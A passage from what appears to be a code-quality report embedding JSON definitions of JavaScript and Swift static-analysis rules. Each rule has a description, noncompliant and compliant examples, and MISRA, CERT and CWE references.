The clause should either take appropriate action, or contain a\nsuitable comment as to why no action is taken.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (param) {  \/\/missing default clause\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n}\n\nswitch (param) {\n  default: \/\/ default clause should be the last one\n    error();\n    break;\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (param) {\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n  default:\n    error();\n    break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n  <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n  <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n  <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness 
<\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:UnusedVariable","repo":"javascript","name":"Unused local variables and functions should be removed","htmlDesc":"<p>If a local variable or a local function is declared but not used, it is dead code and should be removed. Doing so will improve maintainability\nbecause developers will not wonder what the variable or function is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n  var seconds = 0;   \/\/ seconds is never used\n  return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n  return hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:VariableShadowing","repo":"javascript","name":"Variables should not be shadowed","htmlDesc":"<p>Overriding a variable declared in an outer scope can strongly impact the readability, and therefore the maintainability, of a piece of code.\nFurther, it could lead maintainers to introduce bugs because they think they're using one variable but are really using another.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nshow: function(point, element) {\n  if (!this.drops.length) return;\n  var drop, affected = [];\n  this.drops.each( function(drop) {  \/\/ Non-Compliant; defines a new 'drop' parameter\n    if(Droppables.isAffected(point, element, drop))\n      affected.push(drop);\n  });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nshow: function(point, element) {\n  if (!this.drops.length) return;\n  var drop, affected = [];\n  this.drops.each( function(aDrop) {\n    if(Droppables.isAffected(point, element, aDrop))\n      affected.push(aDrop);\n  });\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 5.2 - Identifiers in an inner scope shall not use the same name as an identifier in an outer scope, and therefore hide that\n  identifier 
<\/li>\n  <li> MISRA C++:2008, 2-10-2 - Identifiers declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n  <li> MISRA C:2012, 5.3 - An identifier declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/VwE\">CERT, DCL01-C.<\/a> - Do not reuse variable names in subscopes <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/cwAhAQ\">CERT, DCL01-CPP.<\/a> - Do not reuse variable names in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:WithStatement","repo":"javascript","name":"\"with\" statements should not be used","htmlDesc":"<p>The use of the <code>with<\/code> keyword produces an error in JavaScript strict mode code. However, that's not the worst that can be said against\n<code>with<\/code>.<\/p>\n<p>Using <code>with<\/code> allows a short-hand access to an object's properties - assuming they're already set. But use <code>with<\/code> to access\nsome property not already set in the object, and suddenly you're catapulted out of the object scope and into the global scope, creating or overwriting\nvariables there. 
Since the effects of <code>with<\/code> are entirely dependent on the object passed to it, <code>with<\/code> can be dangerously\nunpredictable, and should never be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n  y: 1\n}\n\nwith (foo) {  \/\/ Noncompliant\n  y = 4;  \/\/ updates foo.x\n  x = 3;  \/\/ does NOT add a foo.x property; updates x var in outer scope\n}\nprint(foo.x + \" \" + x); \/\/ shows: undefined 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n  y: 1\n}\n\nfoo.y = 4;\nfoo.x = 3;\n\nprint(foo.x + \" \" + x); \/\/ shows: 3 a\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"}],"language":"js","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};
      Severity: Minor
      Found in docs/js.html by fixme

      BUG found
      Open

<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif a == a { \/\/ always true\n  doZ()\n}\nif  a != a  { \/\/ always false\n  doY()\n}\nif a == b &amp;&amp; a == b { \/\/ if the first one is true, the second one is too\n  doX()\n}\nif a == b || a == b { \/\/ if the first one is true, the second one is too\n  doW()\n}\n\nvar j = 5 \/ 5 \/\/always 1\nvar k = 5 - 5 \/\/always 0\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Left-shifting 1 onto 1 is common in the construction of bit masks, and is ignored.<\/p>\n<pre>\nvar i = 1 &lt;&lt; 1; \/\/ Compliant\nvar j = a &lt;&lt; a; \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C<\/a> - Detect and remove code that has no effect <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP<\/a> - Detect and remove code that has no effect. <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"BUG"},{"key":"swift:S1821","repo":"swift","name":"\"switch\" statements should not be nested","htmlDesc":"<p>Nested <code>switch<\/code> structures are difficult to understand because you can easily confuse the cases of an inner <code>switch<\/code> as\nbelonging to an outer statement. 
Therefore nested <code>switch<\/code> statements should be avoided.<\/p>\n<p>Specifically, you should structure your code to avoid the need for nested <code>switch<\/code> statements, but if you cannot, then consider moving\nthe inner <code>switch<\/code> to another function.<\/p>","status":"READY","tags":["rank3"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1845","repo":"swift","name":"Methods and field names should not be the same or differ only by capitalization","htmlDesc":"<p>Looking at the set of methods in a <code>class<\/code>, <code>struct<\/code>, <code>enum<\/code>, or <code>extension<\/code> and finding two methods\nthat differ only by capitalization is confusing to users of the class. It is similarly confusing to have a method and a field or a case which differ\nonly in capitalization.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass SomeClass {\n    var lookUp = false\n    func lookup(){ }        \/\/ Noncompliant; method name differs from field name only by capitalization\n    func lookUP(){ }        \/\/ Noncompliant; method name differs from field and another method name only by capitalization\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass SomeClass {\n    var lookUp = false\n    func getLookUp(){ }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1854","repo":"swift","name":"Dead stores should be removed","htmlDesc":"<p>A dead store happens when a local variable is assigned a value that is not read by any subsequent instruction. Calculating or retrieving a value\nonly to then overwrite it or throw it away, could indicate a serious error in the code. 
Even if it's not an error, it is at best a waste of resources.\nTherefore all calculated values should be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunc calculateRate(a:Int, b:Int) {\n  var i:Int\n\n  i = a + b \/\/ Noncompliant; calculation result not used before value is overwritten\n  i = doSomething()  \/\/ Noncompliant; retrieved value not used\n  for i = 0; i &lt; 10; i++ {\n    \/\/  ...\n  }\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunc calculateRate(a:Int, b:Int) {\n  var i:Int\n\n  i = doSomething()\n  i += a + b\n  storeI(i)\n\n  for i = 0; i &lt; 10; i++ {\n    \/\/  ...\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/563.html\">MITRE, CWE-563<\/a> - Assignment to Variable without Use ('Unused Variable') <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/QYA5\">CERT, MSC13-C.<\/a> - Detect and remove unused values <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/S4IyAQ\">CERT, MSC13-CPP.<\/a> - Detect and remove unused values <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/uQCSBg\">CERT, MSC56-J.<\/a> - Detect and remove superfluous code and values <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"Swift","params":[],"type":"BUG"},{"key":"swift:S1996","repo":"swift","name":"Types should be defined in separate source files","htmlDesc":"<p>A file that grows too much tends to aggregate too many responsibilities and inevitably becomes harder to understand and therefore to maintain. This\nis doubly true for a file with multiple independent classes, extensions, protocols, enumerations or structures. 
It is strongly advised to define each\nindividual type in separate source file.<\/p>\n<h2>Exceptions<\/h2>\n<p>The case when file contains only class and its extensions is ignored.<\/p>\n<pre>\nclass MyViewController: UIViewController {\n  \/\/ class stuff here\n}\n\nextension MyViewController: UITableViewDataSource {\n  \/\/ table view data source methods\n}\n\nextension MyViewController: UIScrollViewDelegate {\n  \/\/ scroll view delegate methods\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2007","repo":"swift","name":"Functions and variables should not be defined outside of classes","htmlDesc":"<p>Defining and using global variables and global functions, when the convention dictates OOP can be confusing and difficult to use properly for\nmultiple reasons:<\/p>\n<ul>\n  <li> You run the risk of name clashes. <\/li>\n  <li> Global functions must be stateless, or they can cause difficult-to-track bugs. <\/li>\n  <li> Global variables can be updated from anywhere and may no longer hold the value you expect. <\/li>\n  <li> It is difficult to properly test classes that use global functions. <\/li>\n<\/ul>\n<p>Instead of being declared globally, such variables and functions should be moved into a class, potentially marked <code>static<\/code>, so they can\nbe used without a class instance. 
<\/p>\n<p>This rule checks that only object-oriented programming is used and that no functions or procedures are declared outside of a class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar name = \"Bob\"    \/\/ Noncompliant\n\nfunc doSomething() {   \/\/ Noncompliant\n  \/\/...\n}\n\nclass MyClass {\n    \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class MyClass {\n  public static var name = \"Bob\"\n\n  public class func doSomething() {              \/\/ Compliant\n    \/\/...\n  }\n  \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The operator function is a function with a name that matches the operator to be overloaded. Because such functions can only be defined in a global\nscope, they are ignored by this rule.<\/p>\n<pre>\npublic class Vector2D {\n    var x = 0.0, y = 0.0\n    \/\/ ...\n}\n\nfunc + (left: Vector2D, right: Vector2D) -&gt; Vector2D {\n    return Vector2D(x: left.x + right.x, y: left.y + right.y)\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2068","repo":"swift","name":"Credentials should not be hard-coded","htmlDesc":"<p>Because it is easy to extract strings from a compiled application, credentials should never be hard-coded. Do so, and they're almost guaranteed to\nend up in the hands of an attacker. This is particularly true for applications that are distributed.<\/p>\n<p>Credentials should be stored outside of the code in a strongly-protected encrypted configuration file or database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar post:NSString = \"username=Steve&amp;password=123456\"  \/\/ Noncompliant\nvar postData:NSData = post.dataUsingEncoding(NSASCIIStringEncoding)!\n\/\/...\nvar request:NSMutableURLRequest = NSMutableURLRequest(URL: url)\nrequest.HTTPBody = postData\n\/\/...\nvar urlData: NSData? 
= NSURLConnection.sendSynchronousRequest(request, returningResponse:&amp;response, error:&amp;reponseError)\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar post:NSString = \"username=\\(getEncryptedUser())&amp;password=\\(getEncryptedPass())\"\nvar postData:NSData = post.dataUsingEncoding(NSASCIIStringEncoding)!\n\/\/...\nvar request:NSMutableURLRequest = NSMutableURLRequest(URL: url)\nrequest.HTTPBody = postData\n\/\/...\nvar urlData: NSData? = NSURLConnection.sendSynchronousRequest(request, returningResponse:&amp;response, error:&amp;reponseError)\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/798\">MITRE, CWE-798<\/a> - Use of Hard-coded Credentials <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/259\">MITRE, CWE-259<\/a> - Use of Hard-coded Password <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Porous Defenses <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A2-Broken_Authentication_and_Session_Management\">OWASP Top Ten 2013 Category A2<\/a> -\n  Broken Authentication and Session Management <\/li>\n  <li> Derived from FindSecBugs rule <a href=\"http:\/\/h3xstream.github.io\/find-sec-bugs\/bugs.htm#HARD_CODE_PASSWORD\">Hard Coded Password<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"Swift","params":[],"type":"VULNERABILITY"},{"key":"swift:S2108","repo":"swift","name":"Fields and variables that are never updated should be constant","htmlDesc":"<p>Variables that are never updated will always return their default values and so they should be explicitly declared as constant. 
A\n<code>let<\/code>-declaration guarantees and clearly signals to the programmer that its value is supposed to and will never change.<\/p>\n<p>This rule applies to non-constant fields and variables which are not set within the codebase.<\/p>","status":"READY","tags":["rank1"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2197","repo":"swift","name":"Modulus results should not be checked for direct equality","htmlDesc":"<p>When the modulus of a negative number is calculated, the result will either be negative or zero. Thus, comparing the modulus of a variable for\nequality with a positive number (or a negative one) could result in unexpected results. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunc isOdd(x:Int) -&gt; Bool {\n  return x % 2 == 1  \/\/ Noncompliant; if x is negative, x % 2 == -1\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunc isOdd(x:Int) -&gt; Bool {\n  return x % 2 != 0\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nfunc isOdd(x:Int) -&gt; Bool {\n  return abs(x % 2) == 1\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/xAHAAQ\">CERT, NUM51-J.<\/a> - Do not assume that the remainder operator always returns a\n  nonnegative result for integral operands <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NQBi\">CERT, INT10-C<\/a> - Do not assume a positive remainder when using the % operator\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/_YBLAQ\">CERT, INT10-CPP.<\/a> - Do not assume a positive remainder when using the %\n  operator <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2342","repo":"swift","name":"Enumeration types should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. 
This rule checks that all <code>enum<\/code> names match a provided regular\nexpression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression: <code>^[A-Z][a-zA-Z0-9]*<\/code><\/p>\n<pre>\nenum someEnumeration { \/\/ Non-Compliant\n    case Bar\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nenum SomeEnumeration {\n    case Bar\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Swift","params":[{"key":"format","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"swift:S2343","repo":"swift","name":"Enumeration members should comply with a naming convention","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. This rule checks that all enumeration member names match a provided regular\nexpression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression: <code>^[a-z][a-zA-Z0-9]*$<\/code><\/p>\n<pre>\nenum SomeEnumeration {\n    case SomeMember  \/\/ Non-Compliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nenum SomeEnumeration {\n    case someMember\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Swift","params":[{"key":"format","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"swift:S2523","repo":"swift","name":"Comments should not be nested","htmlDesc":"<p>Nested comments are confusing and can lead maintainers to misunderstand which code is active.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/*\n  This is a comment block.\n  It may be difficult to figure out that the following line of code is actually commented\n\n\nvariable = function_call();\n\/* variable contains the result. Noncompliant; inner comment *\/\n*\/\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 2.3 - The character sequence \/* shall not be used within a comment. <\/li>\n  <li> MISRA C++:2008, 2-7-1 - The character sequence \/* shall not be used within a C-style comment. 
<\/li>\n  <li> MISRA C:2012, 3.1 - The character sequences \/* and \/\/ shall not be used within a comment <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/L4IyAQ\">CERT, MSC04-CPP.<\/a> - Use comments consistently and in a readable fashion\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KgQ\">CERT, MSC04-C.<\/a> - Use comments consistently and in a readable fashion <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2950","repo":"swift","name":"Access control should be specified for top-level definitions","htmlDesc":"<p>The access level defaults to <code>internal<\/code> if left unspecified. Since that doesn't make sense for most top-level declarations, access\nlevels should always be specified explicitly, even when <code>internal<\/code> is what's intended.<\/p>\n<p>This rule raises an issue when the access level is not specified on any top-level declaration.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {  \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo {\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"VULNERABILITY"},{"key":"swift:S2951","repo":"swift","name":"\"break\" should be the only statement in a \"case\"","htmlDesc":"<p>Because <code>case<\/code> statements in a Swift <code>switch<\/code> do not fall through, there is no need to use <code>break<\/code> at the end of a\n<code>case<\/code> unless it would otherwise be empty. Since an empty <code>case<\/code> isn't allowed, an explicit <code>break<\/code> is needed to make\nsuch code compilable. 
There is no other reason to use <code>break<\/code> in a <code>case<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch weekday {\n  case sunday:\n    break\n  case monday:\n    getUpEarly()\n    break  \/\/ Noncompliant\n  case tuesday\n    \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch weekday {\n  case sunday:\n    break\n  case monday:\n    getUpEarly()\n  case tuesday\n    \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2957","repo":"swift","name":"\"return\" should be omitted from single-expression closures","htmlDesc":"<p>When a closure contains only a <code>return<\/code> statement, the <code>return<\/code> itself can be omitted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nsomeList.sort { a, b in\n  return a &gt; b\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nsomeList.sort { a, b in a &gt; b }\n<\/pre>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2958","repo":"swift","name":"Trailing closure syntax should not be used when multiple parameters are of function type","htmlDesc":"<p>Using trailing closure syntax for the last parameter in a call is often the most elegant way to handle it. But if the call requires multiple\nfunction-type arguments, the use of a trailing closure can be messy and confusing. 
In such cases, it's better to pass closure expressions as normal\narguments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = complexOperation(\n  arg: 2,\n  op1: {$0 + 10}\n) {$0 * $0}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = complexOperation(\n  arg: 2,\n  op1: {$0 + 10},\n  op2: {$0 * $0}\n)\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2959","repo":"swift","name":"Statements should not end with semicolons","htmlDesc":"<p>The semicolon (<code>;<\/code>) is optional as a statement separator except in traditional <code>for<\/code> loops and when several statements are\ncombined on one line (which is a bad practice). For cleaner code, semicolons should be omitted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nint a;  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nint a\n<\/pre>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2960","repo":"swift","name":"Operators should be surrounded by whitespace in function definitions","htmlDesc":"<p>Surrounding your operators with whitespace in operator declarations will help maintainers derive meaning from what might otherwise look like a\nmeaningless jumble of punctuation.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunc &lt;*&gt;(a: MyClass, b: MyClass) -&gt; Boolean { \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunc &lt;*&gt; (a: MyClass, b: MyClass) -&gt; Boolean {\n<\/pre>","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2962","repo":"swift","name":"\"get\" should be omitted in read-only computed properties and subscripts","htmlDesc":"<p>For read-only computed properties and subscript declarations, the <code>get<\/code> keyword and its braces are optional, and should be omitted for\nthe sake of brevity.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstruct Magic {\n  var 
number:Int {\n    get {  \/\/ Noncompliant\n      return 42\n    }\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstruct Magic {\n  var number:Int {\n    return 42\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2963","repo":"swift","name":"\"self\" should only be used when required","htmlDesc":"<p>The use of <code>self<\/code> is optional except when in closure expressions, and when it's needed to distinguish between property names and\narguments. For the sake of brevity, <code>self<\/code> should be omitted when it's not strictly required.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Car {\n  var color: Int\n\n  init(color: Int) {\n    self.color = color\n  }\n\n  func fade() {\n    self.color--  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Car {\n  var color: Int\n\n  init(color: Int) {\n    self.color = color\n  }\n\n  func fade() {\n    color--\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2966","repo":"swift","name":"Optionals should not be force-unwrapped","htmlDesc":"<p>The point of declaring an optional variable is to make explicit the fact that it might contain no valid value, i.e. <code>nil<\/code>.\nForce-unwrapping an optional will lead to a runtime error if the optional does contain <code>nil<\/code>. Even if the value is tested first, it's still\nconsidered a bad practice to use force-unwrapping. 
Instead, optional binding or optional chaining should be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar greeting: String?\n\n\/\/ ...\nprintln( \\(greeting!))  \/\/ Noncompliant; could cause a runtime error\n\nif greeting != nil {\n  println( \\(greeting!))  \/\/ Noncompliant; better but still not great\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar greeting: String?\n\n\/\/ ...\nif let howdy = greeting {\n  println(howdy)\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Swift","params":[],"type":"BUG"},{"key":"swift:S2967","repo":"swift","name":"Implicitly unwrapped optionals should not be used","htmlDesc":"<p>The point of using an optional is to signal that the value may be <code>nil<\/code> and to provide graceful ways of dealing with it if it is\n<code>nil<\/code>. While implicitly unwrapped optionals still provide means of dealing with <code>nil<\/code> values, they also signal that the value\nwon't be <code>nil<\/code>, and unwrap it automatically. In addition to sending a decidedly mixed signal, this could lead to runtime errors if the\nvalue ever is <code>nil<\/code>. <\/p>\n<p>It is safest, and clearest to use either an optional or a plain type and avoid the boggy middle ground of implicitly unwrapped optionals.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar greeting : String!  \/\/ Noncompliant\n\nprintln(greeting)  \/\/ At this point the value is nil. Runtime error results\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar greeting : String?\n\nif let howdy = greeting {\n  println(howdy)\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Swift","params":[],"type":"BUG"},{"key":"swift:S2968","repo":"swift","name":"Function type parameters should come at the end of the parameter list","htmlDesc":"<p>Trailing closure syntax can only be used with the last argument to a function call. 
Place a function type parameter anywhere else in the list and\nyou limit the options of the caller.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunc foo(p1: Int-&gt;Int, p2: Int){  \/\/ Noncompliant; p1 should come at the end\n  print(p1(p2))\n}\n\nfoo({a in a * 2}, 42) \/\/ Trailing closure syntax can't be used here\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunc foo(p2: Int, p1: Int-&gt;Int){\n  print(p1(p2))\n}\n\nfoo(42) {a in a * 2}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S3087","repo":"swift","name":"Closure expressions should not be nested too deeply","htmlDesc":"<p>The point of using closure expressions is to clearly express a succinct bit of logic. Start nesting closure expressions too deeply and you create a\nlogic snarl that will likely snare both you and future maintainers.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the maximum depth of 2:<\/p>\n<pre>\nfoo(42) { (x: Int) in\n    bar(x) { (x: Int) in\n      foobar(x) { \/\/ Noncompliant\n        print(x * 42)\n      }\n      print(x + 42)\n    }\n    print(x - 42)\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunc multPlus(x:Int) {\n  foobar(x) {\n    print(x * 42)\n  }\n  print(x + 42)\n}\n\nfoo(42) { (x: Int) in\n    bar(x, multPlus)\n    print(x - 42)\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Swift","params":[{"key":"max","htmlDesc":"The maximum allowed closure expressions nesting depth.","defaultValue":"2","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"swift:S3110","repo":"swift","name":"Infix operators that end with \"=\" should update their left operands","htmlDesc":"<p>The conventional expectation of operators that end with <code>=<\/code>, such as <code>+=<\/code>, <code>-=<\/code>, <code>*=<\/code>, and so on, is\nthat the result of the operation will be assigned to the operand on the left-hand side of the operator.<\/p>\n<p>Define any other behavior and you almost guarantee that the 
users of your code will misunderstand and therefore misuse your operator.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunc **= (p1:Int, p2:Int) -&gt; Int {   \/\/ Noncompliant. Change operator name or update value of first parameter\n    return p1 ** p2\n}\n\nfunc =&gt; (p1:Int, p2:Int) -&gt; Int {  \/\/ Compliant; doesn't end with '='\n    return p1 ** p1 ** p2\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunc **= (inout p1:Int, p2:Int) {\n    p1 = p1 ** p2\n}\n\nfunc =&gt; (p1:Int, p2:Int) -&gt; Int {\n    return p1 ** p1 ** p2\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"BUG"},{"key":"swift:S3111","repo":"swift","name":"Conditional compilation should not be used","htmlDesc":"<p>Conditional compilation is generally recognized as a bad practice that is occasionally necessary when dealing with platform-specific code. As much\nas possible, code should be refactored to minimize or eliminate conditionally-compiled, platform-specific code because even when necessary and\nwell-intentioned, such code segments can leave your codebase in a hopeless tangle.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n#if os(OSX) \/\/ Noncompliant\n    let a = 2\n#else\n    let a = 